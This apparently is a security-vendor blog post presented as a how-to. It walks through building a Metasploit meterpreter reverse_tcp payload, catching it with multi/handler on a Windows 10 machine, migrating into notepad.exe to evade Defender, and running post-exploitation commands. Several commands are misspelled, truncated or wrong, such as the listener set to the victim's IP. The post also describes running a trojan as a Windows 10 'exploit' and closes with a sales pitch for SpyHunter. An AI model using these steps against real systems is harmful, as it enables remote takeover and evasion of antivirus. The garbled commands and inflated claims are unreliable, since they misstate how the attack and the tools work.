|Short Description||Read and write permissions in Windows 10. Allows the attacker to infect other PC connected to the infected one.|
|Symptoms||Appearing of an unfamiliar .exe file.|
|Distribution Method||Spam mails. MiTM attacks, malicious redirects.|
|Detection tool||Download SpyHunter, to See If Your System Has Been Affected By Trojan:Win32/Swrort|
A dangerous exploit has been discovered in Windows 10, using a Trojan:Win32/Swrort to bypass Windows Defender and gain read and write permissions. Anonymous researcher has demonstrated the vulnerability from a channel, called Metasploitstation. He shows 3 phases in which you can slip past Windows 10 defenses. There was no information discovered so far on whether this exploit has been fixed or no.
Windows 10 Multihandler Exploit Infection – How To Do It?
In the video, the tech-savvy user demonstrated a simulation of a ‘123.exe’ file which he creates and executes as if it was opened in the real world as an attachment to an email or executed by another method. We have decided to divide the infection process into three phases to help you better understand the methodology.
Phase 1: File Preparation
The hacker creates a payload with this configuration in a Linux environment:
→msfpaayload windows/meterpreter/reverse_tcp LHOST=
portnumber1* – This is the port used for the attack. It can be any port (4444, 4324, etc.). We have written portnumber1 since he uses a second portnumber that we named
After this phase is complete and the file is created by the attacker and dropped onto the user system, the attacker may proceed to Phase 2.
Phase 2: Using the exploit.
At this point, the attacker uses multihandler to make it view the .exe and take advantage of the exploit to open an active session(connect) to the victim PC.
This can happen using the current command lines:
→msfconsole (To start the console. Opens up ‘msf>’ interface)
In ‘msf’ the attacker can execute the following commands:
set lhost ‘victim IP address’
set lport ‘portnumber1’
After that, the attacker executes the payload to establish a session:
→msfexploit(handler)>set payload windows/meterpreter/reverse_tcp
To check if an active session is possible, the attacker writes the command msfexploit(handler)>show options which enable him to see this
→EXITFUNC process yes Exit technique(accepted: seh, thread..)
LHOST victim IP address yes The listen port
LPORT portnumber1 yes The listen address
This allows him to see that he configured the settings correctly and may proceed with the actual infection of the computer.
Phase 3: Infection
The command that the attacker uses to initiate an active session with the victim is ‘exploit’. After executing this command, the file ‘123.exe’ returned with this reply:
→[*] Started reverse handler on
[*] Starting the payload handler…
At this point, the executable was started on the Windows machine. Despite the fact that Windows Defender software was running, it did not stop the attack. However when scanned for viruses, the Windows antivirus program immediately detected ‘123.exe’ as a Trojan:Win32/Swrort.A.
To avoid detection, the attacker used a tactic, called migrating which created a ‘notepad.exe’ file that migrates the active session from ‘123.exe’ to this file upon connecting. This was done using the command:
After migrating the process and repeating the same simulation but using
From there, the attacker demonstrated full read and wrote permissions by creating a new folder with a new text document. As far as we know the main commands that may be used after connection are:
→>sysinfo – to show the system version and information.
>shell – to show the Windows version and other information.
>getwid – shows Windows ID.
>ps –aux – displays all .exe files running in the Windows Task Manager.
>ifconfig – displays information about interfaces (IP addresses and other information). This command gives the attacker the information to connect to another computer that is in the same NIC and VLAN with the infected PC. This can be very devastating for home or office networks in case such attack is well organized.
Windows 10 Exploits – Conclusion
There is no actual information on whether or not this exploit has been fixed but like with any other software, there may be more uncovered ones. This is why in case you are using Windows 10, we recommend to download and install advanced malware protection program. It will actively protect you and update itself regularly with the latest threats. Also, such program has active shields that immediately detect any unauthorized connections.
Spy Hunter scanner will only detect the threat. If you want the threat to be automatically removed, you need to purchase the full version of the anti-malware tool.Find Out More About SpyHunter Anti-Malware Tool / How to Uninstall SpyHunter